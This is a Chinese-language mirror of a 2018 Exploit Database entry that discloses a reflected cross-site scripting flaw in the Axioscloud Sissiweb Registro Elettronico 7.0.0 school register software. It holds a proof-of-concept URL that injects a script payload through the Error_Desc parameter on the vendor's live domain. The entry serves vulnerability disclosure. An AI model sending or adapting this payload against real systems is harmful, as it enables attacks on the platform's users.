Axioscloud Sissiweb Registro Elettronico 7.0.0 – ‘Error_desc’ Cross-Site Scripting

• Exploit Database
• 120 阅读

• 作者： Dino Barlattani
  日期： 2018-10-24
• 类别：

  • webapps
  平台：

  • aspx
• 来源：https://www.exploit-db.com/exploits/45668/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14

  # Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting # Dork: n/a # Date: 2018-10-11 # Exploit Author: Dino Barlattani # Vendor Homepage: http://axiositalia.it/ # Software Link: http://axiositalia.it/?page_id=1907 # Version: 1.7.0/7.0.0 # Category: Webapps # Platform: ASPX # CVE: N/A # POC: # https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters=